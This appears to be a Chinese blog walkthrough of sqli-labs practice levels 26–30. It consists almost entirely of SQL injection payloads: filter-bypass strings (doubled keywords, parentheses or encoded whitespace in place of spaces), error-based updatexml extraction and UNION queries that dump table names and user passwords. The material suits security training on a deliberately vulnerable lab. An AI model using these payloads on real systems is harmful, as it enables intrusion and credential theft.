sqli-labs靶场通关攻略(26-30关)

嘤嘤奶嘴酱2024-08-26 17:29

第26关 (过滤# -- 空格 and or 等等)

查数据库

这关可以看到,他过滤了我们很多字符

那么我们开始尝试绕过过滤

空格使用括号绕过 and和or使用双写绕过

复制代码 
?id=1'aandnd(updatexml(1,concat(0x7e,(select(database())),0x7e),1))aandnd'1=1

查表

复制代码 
?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema='security'))),1))aandnd'1=1

查列

复制代码 
?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_schema='security'aandnd(table_name='users')))),1))aandnd'1=1

查数据

复制代码 
?id=1'aandnd(updatexml(1,concat(0x7e,(select(group_concat(passwoorrd,username))from(users))),1))aandnd'1=1

第27关(过滤 union、select、注释、空格

查数据库

复制代码 
?id=1'and(updatexml(1,concat(0x7e,database(),0x7e),1))and'1=1

查表

复制代码 
?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(table_name))from(information_schema.tables)where(table_schema='security'))),1))and'1=1

查列

复制代码 
?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(column_name))from(information_schema.columns)where(table_schema='security'and(table_name='users')))),1))and'1=1

查数据

复制代码 
?id=1'and(updatexml(1,concat(0x7e,(selselecselecttect(group_concat(password,username))from(users))),1))and'1=1

第28关(双写+%0a+大小写+('1')=('1绕过)

查数据

复制代码 
?id=0')%09ununion%09selection%09select%091,database(),3%09and%09('1'='1

查表

复制代码 
?id=0')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(table_name)from%0Ainformation_schema.tables%0Awhere%0Atable_schema='security'and('1=1

查列

复制代码 
?id=0')uniunion%0Aselecton%0Aselect%0A1,2,group_concat(column_name)from%0Ainformation_schema.columns%0Awhere%0Atable_schema='security'%0Aand%0Atable_name='users'%0Aand('1=1

第29关( ' 闭合)

查库

复制代码 
?id=' union select 1,2,database() --+

查表

复制代码 
?id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

查列

复制代码 
?id=' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查数据

复制代码 
?id=' union select 1,2,group_concat(username,0x7e,password) from users--+

第30关( " 闭合)

查库

复制代码 
?id=" union select 1,2,database() --+

查表

复制代码 
?id=" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

查列

复制代码 
?id=" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

查数据

复制代码 
?id=" union select 1,2,group_concat(username,0x7e,password) from users--+
相关推荐
Full Stack Developme6 小时前
数据库索引的原理及类型和应用场景
数据库
IDC02_FEIYA8 小时前
SQL Server 2025数据库安装图文教程(附SQL Server2025数据库下载安装包)
数据库·windows
辞砚技术录8 小时前
MySQL面试题——联合索引
数据库·面试
萧曵 丶8 小时前
MySQL 主键不推荐使用 UUID 的深层原因
数据库·mysql·索引
小北方城市网8 小时前
分布式锁实战指南:从选型到落地,避开 90% 的坑
java·数据库·redis·分布式·python·缓存
毕设十刻9 小时前
基于Vue的人事管理系统67zzz(程序 + 源码 + 数据库 + 调试部署 + 开发环境配置),配套论文文档字数达万字以上,文末可获取,系统界面展示置于文末
前端·数据库·vue.js
TDengine (老段)10 小时前
TDengine Python 连接器入门指南
大数据·数据库·python·物联网·时序数据库·tdengine·涛思数据
萧曵 丶11 小时前
事务ACID特性详解
数据库·事务·acid
kejiayuan11 小时前
CTE更易懂的SQL风格
数据库·sql
kaico201811 小时前
MySQL的索引
数据库·mysql
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03Linux下V2Ray安装配置指南04安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)05jdk21下载、安装(Windows、Linux、macOS)06Claude Code 2.1.2 升级报错?别折腾了,一行命令搞定07KGG转MP3工具|非KGM文件|解密音频08【踩坑笔记】50系显卡适配的 PyTorch 安装092025-04-03 Latex学习1——本地配置Latex + VScode环境10UV安装并设置国内源